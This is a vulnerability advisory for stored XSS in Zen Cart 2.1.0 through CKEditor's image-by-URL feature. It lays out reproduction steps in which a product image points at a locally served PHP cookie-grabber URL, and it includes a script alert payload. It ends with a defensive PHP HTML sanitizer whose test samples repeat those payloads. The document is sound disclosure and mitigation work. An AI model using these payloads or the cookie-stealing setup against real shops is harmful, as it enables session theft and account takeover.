Zencart | Stored XSS on adding products via SVG image

Information

Software Type: Web App
Software Name: Zen-Cart
Affected Version: 2.1.0
Software Vendor: Zen Ventures, LLC
Software Link: https://github.com/zencart/zencart
Severity: High
CVSS Score: 7.2
CVE Link: N/A
Affected Assets: 30171+
Date of Discovery: Jan 9th, 2025
PoC Exploit: https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Description

Zencart has a feature that lets administrators change the text editor used across the website for editing pages and products. It offers two choices: a “Plain text” editor and “CKEditor”.

The problem is that CKEditor allows inserting images by link. SVG images are blacklisted by default in Zencart: if you try to upload an SVG file you get an error, but you can still embed an SVG file through CKEditor's “Insert image from URL” functionality, because that path is not subject to the upload filter.

In fact, you can also insert a link to a malicious .php cookie grabber, and the application will treat it as an image. The request to that URL is then triggered as soon as the web page loads.


Reproduce

To reproduce the issue, I am going to use a PHP cookie stealer script to demonstrate how this vulnerability can be used to steal cookies.

Save the following file as capture.php:

https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd

Launch a PHP server to serve this file:

> php -S 0.0.0.0:1718


To reproduce this issue, change your Text Editor's type from Plain Text to CKEditor. You can make this change through [/index.php?cmd=define_pages_editor]

Once done, open a product for editing; the URI will look something like this:

[/index.php?cmd=product&page=1&cPath=1_4&product_type=1&pID=1&action=new_product]

Click the “Insert image via URL” icon in CKEditor. A small window appears asking for an image link, but there is no filtering in place to ensure that this feature is used only to insert images and not something else.

Inside this small window, you can put the full link to your PHP cookie grabber; in my case it's the following:

http://127.0.0.1:1718/capture.php


Now visit the product page and check your PHP server for cookie logs:

http://127.0.0.1/zencart/index.php?main_page=product_info&cPath=1_4&products_id=1

Additionally, the following payload works as well:

<script>alert("hacked")</script>
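The root cause described above is that HTML submitted through the admin editor is stored and rendered on the storefront without any server-side check of the tags it contains or of where `<img>` elements point. The following PHP sanitizer is an added example written for this write-up; it is not Zen Cart's own code and does not describe how Zen Cart processes product descriptions. It assumes a PHP 8 runtime, that the caller passes in the store's own host name (the sample uses the constructed value `shop.example`), that product images live under a relative `images/` path, and that the tag, attribute and extension allowlists are illustrative values a site would tune. It drops `<script>` and similar elements with their content, unwraps other unlisted tags, removes every attribute not on the allowlist (which covers `onerror`, `onload` and `style`), and keeps an `<img>` only when its `src` is an http(s) URL on an allowed host or a plain relative path, ending in a raster image extension, so neither the remote `capture.php` URL nor an SVG survives.

```php
<?php
// Added example, not Zen Cart's own code: allowlist sanitizer for rich-text HTML
// before it is stored as a product description. Assumptions: PHP 8, the store host
// is supplied by the caller, and the lists below are illustrative, not Zen Cart's.

const ALLOWED_TAGS      = ['p', 'br', 'b', 'strong', 'i', 'em', 'u', 'ul', 'ol', 'li', 'a', 'img', 'h2', 'h3'];
const DROP_WITH_CONTENT = ['script', 'style', 'iframe', 'object', 'embed', 'svg', 'math', 'template', 'form'];
const ALLOWED_ATTRS     = ['href', 'src', 'alt', 'title'];
const ALLOWED_IMAGE_EXT = ['png', 'jpg', 'jpeg', 'gif', 'webp'];

/** Accept only http(s) URLs on an allowed host, or plain relative paths, ending in a raster image extension. */
function isSafeImageUrl(string $url, array $allowedHosts): bool
{
    // Browsers normalise "\" to "/", so "/\evil.example/x.png" becomes protocol-relative; reject outright.
    if ($url === '' || str_contains($url, '\\')) {
        return false;
    }
    $parts = parse_url($url);
    if ($parts === false) {
        return false;
    }
    $path = $parts['path'] ?? '';
    if (isset($parts['scheme']) || isset($parts['host'])) {
        // Absolute or protocol-relative URL: require http(s) AND a host we control.
        // This rejects data:, javascript:, and every third-party host.
        if (!isset($parts['scheme'], $parts['host'])
            || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)
            || !in_array(strtolower($parts['host']), $allowedHosts, true)) {
            return false;
        }
    } elseif (str_starts_with($path, '//')) {
        return false;
    }
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    return in_array($ext, ALLOWED_IMAGE_EXT, true); // .svg and .php never pass
}

/** Walk the tree, dropping, unwrapping or stripping nodes according to the allowlists. */
function sanitizeNode(DOMNode $node, array $allowedHosts): void
{
    $children = iterator_to_array($node->childNodes); // snapshot: we mutate while walking
    foreach ($children as $child) {
        if (!($child instanceof DOMElement)) {
            if (!($child instanceof DOMText)) {
                $node->removeChild($child); // comments, CDATA, processing instructions
            }
            continue;
        }
        $tag = strtolower($child->tagName);
        if (in_array($tag, DROP_WITH_CONTENT, true)) {
            $node->removeChild($child);
            continue;
        }
        if (!in_array($tag, ALLOWED_TAGS, true)) {
            // Unlisted but harmless container (div, span, ...): keep its sanitized children, drop the wrapper.
            sanitizeNode($child, $allowedHosts);
            while ($child->firstChild !== null) {
                $node->insertBefore($child->firstChild, $child);
            }
            $node->removeChild($child);
            continue;
        }
        $attrNames = [];
        foreach ($child->attributes as $attr) {
            $attrNames[] = $attr->name;
        }
        foreach ($attrNames as $name) {
            if (!in_array(strtolower($name), ALLOWED_ATTRS, true)) {
                $child->removeAttribute($name); // on* handlers, style, srcset, ...
            }
        }
        if ($tag === 'img' && !isSafeImageUrl($child->getAttribute('src'), $allowedHosts)) {
            $node->removeChild($child);
            continue;
        }
        if ($tag === 'a') {
            $scheme = strtolower((string) parse_url($child->getAttribute('href'), PHP_URL_SCHEME));
            if ($scheme !== '' && !in_array($scheme, ['http', 'https', 'mailto'], true)) {
                $child->removeAttribute('href'); // javascript:, data:, ...
            }
        }
        sanitizeNode($child, $allowedHosts);
    }
}

/** Parse an HTML fragment, sanitize it, and serialise what is left. */
function sanitizeEditorHtml(string $html, array $allowedHosts): string
{
    $doc = new DOMDocument();
    $previous = libxml_use_internal_errors(true); // tolerate malformed editor output quietly
    $doc->loadHTML('<?xml encoding="UTF-8"><div>' . $html . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($previous);
    $root = $doc->getElementsByTagName('div')->item(0); // our wrapper is the first div in document order
    sanitizeNode($root, $allowedHosts);
    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed samples: the two payloads from the advisory plus a benign description and an SVG on our own host.
$allowedHosts = ['shop.example'];
foreach ([
    '<p>Blue shirt <img src="images/shirt.png" alt="shirt"></p>',
    '<img src="http://127.0.0.1:1718/capture.php">',
    '<img src="http://shop.example/images/logo.svg">',
    '<script>alert("hacked")</script><p>text</p>',
    '<p onmouseover="alert(1)"><a href="javascript:alert(1)">x</a></p>',
] as $sample) {
    printf("%-70s => %s\n", $sample, sanitizeEditorHtml($sample, $allowedHosts));
}
```

Running this keeps the benign description intact, removes both `<img>` elements that point at `capture.php` and at the SVG, strips the `<script>` element while keeping the paragraph after it, and drops the `onmouseover` handler and the `javascript:` link. Two caveats for anyone deploying something like this: an extension check on a remote URL only says what the path looks like, not what the server returns, which is why the host allowlist does the real work; and a client-side restriction in the CKEditor dialog is not a control at all, since an administrator's browser can submit any HTML directly. Pairing the server-side sanitizer with a Content-Security-Policy such as `img-src 'self'` on storefront pages limits the damage if a bad description ever reaches the database.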


Proof of Concept (PoC) Video

Posted on: May 24, 2025 05:58 AM